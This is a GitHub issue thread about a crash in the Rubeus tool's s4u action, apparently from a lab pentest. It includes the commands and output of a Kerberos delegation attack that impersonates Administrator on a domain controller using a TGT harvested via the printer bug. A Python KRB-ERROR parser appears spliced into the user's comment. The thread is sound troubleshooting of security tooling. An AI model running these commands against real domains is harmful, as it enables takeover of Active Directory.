Unhandled Exception: System.OverflowException: Value was either too large or too small for a UInt32. #19

Closed
iambooker opened this issue Feb 1, 2019 · 5 comments

Comments

@iambooker

Hello guys,

I am using the monitor action in order to grab TGTs after a successful "attack" against the "Print Spooler" service that is running on a domain host (in our case LABS-DC01$).

UserName                 : LABS-DC01$
Domain                   : LABS
LogonId                  : 4773477
UserSID                  : S-1-5-21-1871540109-507438259-1164035318-1001
AuthenticationPackage    : Kerberos
LogonType                : Network
LogonTime                : 2/1/2019 10:14:21 AM
LogonServer              :
LogonServerDNSDomain     : LABS.COM
UserPrincipalName        :

ServiceName              : krbtgt/LABS.COM
TargetName               :
ClientName               : LABS-DC01$
DomainName               : LABS.COM
TargetDomainName         : LABS.COM
AltTargetDomainName      : LABS.COM
SessionKeyType           : aes256_cts_hmac_sha1
Base64SessionKey         : EFzxu0gMFHnvXEA81575frbhPdKySWK/Y871RmTAaf4=
KeyExpirationTime        : 1/1/1601 2:00:00 AM
TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime                : 2/1/2019 10:25:38 AM
EndTime                  : 2/1/2019 8:25:37 PM
RenewUntil               : 2/8/2019 10:25:37 AM
TimeSkew                 : 0
EncodedTicketSize        : 1298
Base64EncodedTicket      :


Then, I am using the s4u action with the harvested TGT ticket (I have provided it both in base64 raw format and in .kirbi format after proper conversion) in order to impersonate a Domain Admin account and get a TGS ticket for the CIFS service on the DC.

The problem is that I am getting the following error during the execution of the s4u action:

Execution of the S4U action:

.\Rubeus.exe s4u /impersonateuser:Administrator /ticket:<base64-ticket-value> /msdsspn:cifs/labs-dc01.labs.com

OR:

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64-ticket-value>"))
.\Rubeus.exe s4u /impersonateuser:Administrator /ticket:ticket.kirbi /msdsspn:cifs/labs-dc01.labs.com

Error:

[*] Action: S4U
[*] Using domain controller: LABS-DC01.labs.com (10.10.10.20)
[*] Building S4U2self request for: 'LABS.COM\LABS-DC01$'
[*] Impersonating user 'Administrator' to target SPN 'cifs/labs-dc01.labs.com'
[*] Sending S4U2self request
[*] Connecting to 10.10.10.20:88
[*] Sent 1458 bytes
[*] Received 1482 bytes
[+] S4U2self success!
[*] Building S4U2proxy request for service: 'cifs/labs-dc01.labs.com'
[*] Sending S4U2proxy request
[*] Connecting to 10.10.10.20:88
[*] Sent 2557 bytes
[*] Received 127 bytes
Unhandled Exception: System.OverflowException: Value was either too large or too small for a UInt32.
   at System.Convert.ToUInt32(Int64 value)
   at Rubeus.KRB_ERROR..ctor(AsnElt body)
   at Rubeus.S4U.Execute(KRB_CRED kirbi, String targetUser, String targetSPN, Boolean ptt, String domainController, String altService)
   at Rubeus.Commands.S4u.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)

Is that an issue indeed, or am I missing something?
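The trace above dies inside the KRB_ERROR constructor while narrowing a value from the 127-byte KRB-ERROR reply to UInt32. As an added example (not Rubeus code), the walker below decodes the INTEGER fields of a DER-encoded KRB-ERROR as the signed values RFC 4120 defines (error-code is Int32) and range-checks before narrowing, so an out-of-range field produces a clear error instead of an unhandled exception; the sample reply and the tlv/integer/ctx builder helpers are constructed for this example and omit the optional fields and sname.

```python
def der_read(buf, pos=0):
    """Read one DER TLV at pos; returns (tag, value, next_pos). Tag numbers < 31 only."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def der_children(value):
    """Split a constructed value into its (tag, value) children."""
    out, pos = [], 0
    while pos < len(value):
        tag, v, pos = der_read(value, pos)
        out.append((tag, v))
    return out

def to_uint32(n):
    """Narrow to UInt32 with an explicit range check instead of an unhandled overflow."""
    if not 0 <= n <= 0xFFFFFFFF:
        raise ValueError(f"value {n} does not fit in UInt32")
    return n

def parse_krb_error(msg):
    """Return {field_index: int} for the INTEGER fields of a KRB-ERROR (RFC 4120 5.9.1)."""
    tag, body, _ = der_read(msg)
    if tag != 0x7E:  # [APPLICATION 30], constructed
        raise ValueError("not a KRB-ERROR")
    tag, seq, _ = der_read(body)
    if tag != 0x30:
        raise ValueError("KRB-ERROR body is not a SEQUENCE")
    fields = {}
    for ctx_tag, inner in der_children(seq):
        itag, ival = der_children(inner)[0]  # each [n] wrapper holds exactly one value
        if itag == 0x02:  # INTEGER: DER integers are two's complement, so decode signed
            fields[ctx_tag & 0x1F] = int.from_bytes(ival, "big", signed=True)
    return fields

# Minimal DER builder, used only to construct the sample reply (short-form lengths).
def tlv(tag, content):
    return bytes([tag, len(content)]) + content
def integer(i):
    return tlv(0x02, i.to_bytes((i.bit_length() + 8) // 8, "big", signed=True))
def ctx(n, content):
    return tlv(0xA0 | n, content)

def build_krb_error(error_code):
    """Constructed KRB-ERROR carrying pvno, msg-type, stime, susec, error-code, realm."""
    seq = (ctx(0, integer(5)) + ctx(1, integer(30)) + ctx(4, tlv(0x18, b"20190201082537Z"))
           + ctx(5, integer(0)) + ctx(6, integer(error_code)) + ctx(9, tlv(0x1B, b"LABS.COM")))
    return tlv(0x7E, tlv(0x30, seq))

SAMPLE = build_krb_error(13)  # constructed sample; 13 is KDC_ERR_BADOPTION
```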

@iambooker
Author

The issue has been resolved! I should use another release of Rubeus in order to achieve what I want to do!

@HarmJ0y
Member

HarmJ0y commented Feb 5, 2019

@stathisb how did you resolve the issue? It looks like some value in KRB_ERROR is being miscast, but without being able to recreate I don't know the best way to trace which value it is.

@iambooker
Author

@HarmJ0y I was testing some case studies of the well-known article "Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory" by Elad Shamir. I got this issue when I tested the exploitation of unconstrained delegation in conjunction with "the printer bug". Also, the same issue arose when I tested the case study named "When Accounts Collude - TrustedToAuthForDelegation Who?" that is illustrated by Shamir in his article. However, this attack makes use of a forwardable TGS during the execution of S4U, something that is not provided by your current Rubeus release.
Finally, this issue was resolved by using the modified Rubeus released by Shamir! I did not test whether Shamir's release can resolve the issue in the "print spooler" case study.

@HarmJ0y
Member

HarmJ0y commented Feb 7, 2019

So Elad's modification listed on that post (eladshamir@10689df) was integrated yesterday into the Rubeus master branch (47f330f). If you can retest using the most up-to-date Rubeus master branch, let me know, but for now I'm going to close this issue out.

@HarmJ0y HarmJ0y closed this as completed Feb 7, 2019
@iambooker
Author

@HarmJ0y, I have tested your current release against my previous unsuccessful case studies and now it seems that the issue has been resolved! I will further inform you in case of any other issue. Thank you :)
